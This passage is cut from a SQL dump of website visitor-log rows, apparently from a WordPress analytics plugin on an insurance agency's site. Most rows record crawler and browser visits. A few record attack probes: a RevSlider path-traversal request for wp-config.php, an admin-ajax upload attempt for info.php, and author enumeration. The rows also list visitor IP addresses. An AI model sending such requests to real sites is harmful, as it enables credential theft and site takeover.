http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(20759,'0b_e910818b8c9475920fb4c73a96f14dde','1461522944','144.76.8.132','static.132.8.76.144.clients.your-server.de','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(20762,'0b_e910818b8c9475920fb4c73a96f14dde','1461522946','144.76.8.132','static.132.8.76.144.clients.your-server.de','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(20763,'0b_e910818b8c9475920fb4c73a96f14dde','1461522948','144.76.8.132','static.132.8.76.144.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(20766,'0b_0c9afade1f4b3028cfb571468022c17d','1461524875','46.118.156.3','sol-fttb.3.156.118.46.sovam.net.ua','/','Mozilla/4.76 [en] (Windows NT 5.0; U)','http://special-porn.com/','',0,'Win2000','Netscape 4','ua','','','','','','','0','0',0),(20768,'0b_de9455e758af843d638d58d0bd21db10','1461526603','178.137.90.202','178-137-90-202-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]','http://xn--80acerqftc.com.ua/','',0,'WinNT 4.0','Opera 7','us','','','','','','','0','0',0),(20771,'0b_de9455e758af843d638d58d0bd21db10','1461526603','178.137.90.202','178-137-90-202-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]','http://xn--80acerqftc.com.ua/','',0,'WinNT 4.0','Opera 7','us','','','','','','','0','0',0),(20772,'0b_ace12b0618c348526c98511f9d7155af','1461527947','207.46.13.73','msnbot-207-46-13-73.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20775,'0b_0f08d758d68fed0928927825607b75dd','1461529403','66.249.66.14','crawl-66-249-66-14.googlebot.com','/illustration.htm','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(20777,'0b_eece75f50b3c4207b7668b813f81db71','1461529551','46.119.112.23','sol-fttb.23.112.119.46.sovam.net.ua','/robots.txt','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','Unknown Spider','','','','3','0',0),(20780,'0b_eece75f50b3c4207b7668b813f81db71','1461529552','46.119.112.23','sol-fttb.23.112.119.46.sovam.net.ua','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','Unknown Spider','','','','3','0',0),(20783,'0b_eece75f50b3c4207b7668b813f81db71','1461529554','46.119.112.23','sol-fttb.23.112.119.46.sovam.net.ua','/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=info.php','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','','','','','3','0',0),(20786,'0b_eece75f50b3c4207b7668b813f81db71','1461529556','46.119.112.23','sol-fttb.23.112.119.46.sovam.net.ua','/','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','','','','','3','0',0),(20789,'0b_e881dd7421890c29cf11f509140d5c85','1461532588','216.81.71.94','216.81.71.94','/','=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16','','',0,'Win7','','','','','','','','','0','0',0),(20792,'0b_b0a98de3c1ecf5b643ca929a95c007b9','1461533155','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/SSO/235_38.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20793,'0b_10fd3f0034c0f74ea46637c5a0952579','1461540810','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20796,'0b_10fd3f0034c0f74ea46637c5a0952579','1461540810','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20799,'0b_10fd3f0034c0f74ea46637c5a0952579','1461540827','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/illustration.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20802,'0b_fbdd0ec4f452a826a4b68835fb6c7622','1461542195','66.87.120.84','66-87-120-84.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','375 x 667','','','','','','0','0',0),(20805,'0b_fbdd0ec4f452a826a4b68835fb6c7622','1461542197','66.87.120.84','66-87-120-84.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','375 x 667','','','','','','0','0',0),(20808,'0b_fbdd0ec4f452a826a4b68835fb6c7622','1461542235','66.87.120.84','66-87-120-84.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','375 x 667','','','','','','0','51',0),(20811,'0b_fbdd0ec4f452a826a4b68835fb6c7622','1461542236','66.87.120.84','66-87-120-84.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','375 x 667','','','','','','0','0',0),(20814,'0b_fbdd0ec4f452a826a4b68835fb6c7622','1461542327','66.87.120.84','66-87-120-84.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','375 x 667','','','','','','0','51',0),(20817,'0b_fbdd0ec4f452a826a4b68835fb6c7622','1461542327','66.87.120.84','66-87-120-84.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','375 x 667','','','','','','0','0',0),(20819,'0b_fbdd0ec4f452a826a4b68835fb6c7622','1461542328','66.87.120.84','66-87-120-84.pools.spcsdns.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','375 x 667','','','','','','0','51',0),(20820,'0b_fbdd0ec4f452a826a4b68835fb6c7622','1461542329','66.87.120.84','66-87-120-84.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1','','',0,'iPhone OS','Safari 9 Mobile','us','375 x 667','','','','','','0','0',0),(20822,'0b_371f6e58dde32da4200e4c5239a3d7aa','1461543719','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(20823,'0b_16a99b82804b8725c12e0270d4c90344','1461543720','100.43.81.146','spider-100-43-81-146.yandex.com','/home/feed/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(20826,'0b_6cdc277e775b715db812f9c7f3f0db1a','1461545044','100.43.81.146','spider-100-43-81-146.yandex.com','/term-quotes/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(20829,'0b_424ce5f330b2603bcd8dc9f00bc75492','1461546864','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20832,'0b_329b4ec67c66106c3d73d72f9dbeef15','1461547897','66.249.66.14','crawl-66-249-66-14.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20834,'0b_329b4ec67c66106c3d73d72f9dbeef15','1461547897','66.249.66.8','crawl-66-249-66-8.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(20837,'0b_6fe5d6095ddf2968230289f34b30287e','1461551956','37.187.173.172','ns374406.ip-37-187-173.eu','/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','HTTP_Request2/2.3.0 (http://pear.php.net/package/http_request2) PHP/5.3.3','','',0,'','','eu','','','HTTP_Request2','','','','3','0',0),(20840,'0b_1cb70e108d9666a0fe7fc0f59b77ddd3','1461552008','66.249.66.8','crawl-66-249-66-8.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20841,'0b_1cb70e108d9666a0fe7fc0f59b77ddd3','1461552009','66.249.66.24','crawl-66-249-66-24.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20843,'0b_feb66275aabbb95d01aa3468e44805cc','1461552755','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(20844,'0b_02eba0932d9a834af7fcfddc57b75974','1461559984','169.54.233.124','7c.e9.36a9.ip4.static.sl-reverse.com','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(20846,'0b_f458dcca453688f2ad729cf9e38f9a39','1461560377','110.44.121.134','110.44.121.134','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win8','Chrome 49','us','','','','','','','0','0',0),(20847,'0b_f237e94a9804d6c7aa830a11dc4763d1','1461561352','110.44.121.134','110.44.121.134','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(20850,'0b_a91d46080a0e1aca7112ead0f89c6a6c','1461561363','202.166.220.197','197.220.166.202.ether.static.wlink.com.np','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','np','','','','','','','0','0',0),(20853,'0b_a91d46080a0e1aca7112ead0f89c6a6c','1461561368','202.166.220.197','197.220.166.202.ether.static.wlink.com.np','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','np','','','','','','','0','0',0),(20855,'0b_198b2f6d1dc3ff43a22accad98e2ad83','1461562636','91.200.12.26','huangdisisi0708.com','/?author=1','Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)','http://www.empireins.com/?author=1','',0,'Win7','IE 9','cn','','','','','','','0','0',0),(20856,'0b_11a7c7678a99ff804a1c4c94d6153d67','1461562637','91.200.12.26','huangdisisi0708.com','/?author=1','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(20859,'0b_11a7c7678a99ff804a1c4c94d6153d67','1461562638','91.200.12.26','huangdisisi0708.com','/author/admin/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(20861,'0b_11a7c7678a99ff804a1c4c94d6153d67','1461562640','91.200.12.26','huangdisisi0708.com','/?author=2','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(20864,'0b_11a7c7678a99ff804a1c4c94d6153d67','1461562643','91.200.12.26','huangdisisi0708.com','/?author=3','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(20865,'0b_11a7c7678a99ff804a1c4c94d6153d67','1461562648','91.200.12.26','huangdisisi0708.com','/?author=4','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(20867,'0b_11a7c7678a99ff804a1c4c94d6153d67','1461562651','91.200.12.26','huangdisisi0708.com','/?author=5','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','','',0,'Win2000','IE 6','','','','','','','','0','0',0),(20870,'0b_9d654fc84c2ebe5451fef2d293a414be','1461562928','66.249.66.21','crawl-66-249-66-21.googlebot.com','/discl.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(20873,'0b_a4a64fc62ddbf627e049da1d889a7482','1461569058','157.55.39.125','msnbot-157-55-39-125.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20876,'0b_f33f1c1a2b6687c0e0c8c159619c1e79','1461572071','178.137.87.242','178-137-87-242-lvv.broadband.kyivstar.net','/robots.txt','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','','','','Unknown Spider','','','','3','0',0),(20879,'0b_f33f1c1a2b6687c0e0c8c159619c1e79','1461572072','178.137.87.242','178-137-87-242-lvv.broadband.kyivstar.net','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','','','','Unknown Spider','','','','3','0',0),(20880,'0b_f33f1c1a2b6687c0e0c8c159619c1e79','1461572074','178.137.87.242','178-137-87-242-lvv.broadband.kyivstar.net','/','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','','','','','','','','3','0',0),(20883,'0b_f6bff2fa7bf16b0fed1c88310bb2722d','1461574615','40.77.167.40','msnbot-40-77-167-40.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(20885,'0b_13552fecfb01bfac2ca760f12812431a','1461577045','174.139.15.50','174.139.15.50.static.krypt.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','cn','1440 x 900','Google','','','','','0','0',0),(20886,'0b_13552fecfb01bfac2ca760f12812431a','1461577061','174.139.15.50','174.139.15.50.static.krypt.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','cn','1440 x 900','','','','','','0','0',0),(20889,'0b_3da2fa2e6de268b6fe25bf7ba8940291','1461578904','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/robots.txt','Python-urllib/2.7','','',0,'','','','','','Python-urllib','','','','0','0',0),(20891,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578905','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20894,'0b_4d997329472f15695d632b25dbcdbb11','1461578907','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(20897,'0b_4d997329472f15695d632b25dbcdbb11','1461578909','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','http://www.empireins.com/','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(20898,'0b_4d997329472f15695d632b25dbcdbb11','1461578911','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(20901,'0b_4d997329472f15695d632b25dbcdbb11','1461578912','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','http://www.empireins.com/','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','0',0),(20903,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578913','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/agent-tools/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20906,'0b_4d997329472f15695d632b25dbcdbb11','1461578914','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/agent-tools/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20907,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578915','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20910,'0b_4d997329472f15695d632b25dbcdbb11','1461578917','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20913,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578918','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/contact/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20915,'0b_4d997329472f15695d632b25dbcdbb11','1461578919','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20918,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578920','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20919,'0b_4d997329472f15695d632b25dbcdbb11','1461578921','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20922,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578922','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/carriers/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20924,'0b_4d997329472f15695d632b25dbcdbb11','1461578924','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/carriers/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20927,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578925','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/aig-releases-new-term-rates-and-re-enters-ny/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20930,'0b_4d997329472f15695d632b25dbcdbb11','1461578926','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20933,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578927','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20936,'0b_4d997329472f15695d632b25dbcdbb11','1461578928','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20937,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578929','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/insentives/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20939,'0b_4d997329472f15695d632b25dbcdbb11','1461578930','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/insentives/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20940,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578931','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/licensing-contracting/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20942,'0b_4d997329472f15695d632b25dbcdbb11','1461578932','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/licensing-contracting/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20943,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578934','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/about-us/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20945,'0b_4d997329472f15695d632b25dbcdbb11','1461578935','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20946,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578936','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/register/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20949,'0b_4d997329472f15695d632b25dbcdbb11','1461578937','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/register/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20951,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578938','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/case-status/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20952,'0b_4d997329472f15695d632b25dbcdbb11','1461578939','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/case-status/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20954,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578940','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/igo/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20955,'0b_4d997329472f15695d632b25dbcdbb11','1461578943','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/igo/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20957,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578945','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/forms/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20960,'0b_4d997329472f15695d632b25dbcdbb11','1461578946','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/forms/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34','','',0,'Linux','PhantomJS 1','us','1024 x 768','','','','','','3','51',0),(20961,'0b_588d1ef34bf6daadd29ef6a9ad323223','1461578947','54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/term-quotes/','python-requests/2.7.0 CPython/2.7.6 Linux/3.13.0-85-generic','','',0,'Linux','','','','','python','','','','3','0',0),(20963,'0b_4d997329472f15695d632b25dbcdbb11','1461578948','127.0.0.1, 54.187.9.44','ec2-54-187-9-44.us-west-2.compute.amazonaws.com','/term-quotes/','Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 